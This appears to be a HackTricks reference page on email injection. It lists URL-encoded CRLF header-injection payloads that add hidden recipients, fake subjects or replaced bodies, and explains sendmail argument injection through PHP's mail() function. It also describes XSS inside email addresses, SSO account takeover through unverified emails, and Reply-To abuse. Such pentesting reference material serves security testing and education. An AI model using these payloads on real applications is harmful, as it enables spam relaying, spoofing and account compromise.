Search K
Appearance
Appearance
Use Trickest to easily build and automate workflows powered by the world's most advanced community tools.
Get Access Today:
Other ways to support HackTricks:
From:sender@domain.com%0ACc:recipient@domain.co,%0ABcc:recipient1@domain.com
The message will be sent to the recipient and recipient1 accounts.
From:sender@domain.com%0ATo:attacker@domain.com
The message will be sent to the original recipient and the attacker account.
From:sender@domain.com%0ASubject:This is%20Fake%20Subject
The fake subject will be added to the original subject and in some cases will replace it. It depends on the mail service behavior.
Inject a two-line feed, then write your message to change the body of the message.
From:sender@domain.com%0A%0AMy%20New%20%0Fake%20Message.
# The function has the following definition:
php --rf mail
Function [ <internal:standard> function mail ] {
- Parameters [5] {
Parameter #0 [ <required> $to ]
Parameter #1 [ <required> $subject ]
Parameter #2 [ <required> $message ]
Parameter #3 [ <optional> $additional_headers ]
Parameter #4 [ <optional> $additional_parameters ]
}
}
This section is going to be based on how to abuse this parameter supposing that an attacker controls it.
This parameter is going to be added to the command line PHP will be using to invoke the binary sendmail. However, it will be sanitised with the function escapeshellcmd($additional_parameters)
.
An attacker can inject extract parameters for sendmail in this case.
sendmail interface is provided by the MTA email software (Sendmail, Postfix, Exim etc.) installed on the system. Although the basic functionality (such as -t -i -f parameters) remains the same for compatibility reasons, other functions and parameters vary greatly depending on the MTA installed.
Here are a few examples of different man pages of sendmail command/interface:
Depending on the origin of the sendmail binary different options have been discovered to abuse them and leak files or even execute arbitrary commands. Check how in https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html
The symbols: +, - and {} in rare occasions can be used for tagging and ignored by most e-mail servers
Comments between parentheses () at the beginning or the end will also be ignored
You can also use IPs as domain named between square brackets:
Some services like github or salesforce allows you to create an email address with XSS payloads on it. If you can use this providers to login on other services and this services aren't sanitising correctly the email, you could cause XSS.
If a SSO service allows you to create an account without verifying the given email address (like salesforce) and then you can use that account to login in a different service that trusts salesforce, you could access any account.
Note that salesforce indicates if the given email was or not verified but so the application should take into account this info.
You can send an email using From: company.com and Replay-To: attacker.com and if any automatic reply is sent due to the email was sent from an internal address the attacker may be able to receive that response.
Certain services, like AWS, implement a threshold known as the Hard Bounce Rate, typically set at 10%. This is a critical metric, especially for email delivery services. When this rate is exceeded, the service, such as AWS's email service, may be suspended or blocked.
A hard bounce refers to an email that has been returned to the sender because the recipient's address is invalid or non-existent. This could occur due to various reasons, such as the email being sent to a non-existing address, a domain that isn't real, or the recipient server's refusal to accept emails.
In the context of AWS, if you send 1000 emails and 100 of them result in hard bounces (due to reasons like invalid addresses or domains), this would mean a 10% hard bounce rate. Reaching or exceeding this rate can trigger AWS SES (Simple Email Service) to block or suspend your email sending capabilities.
It's crucial to maintain a low hard bounce rate to ensure uninterrupted email service and maintain sender reputation. Monitoring and managing the quality of the email addresses in your mailing lists can significantly help in achieving this.
For more detailed information, AWS's official documentation on handling bounces and complaints can be referred to AWS SES Bounce Handling.
Other ways to support HackTricks:
Use Trickest to easily build and automate workflows powered by the world's most advanced community tools.
Get Access Today: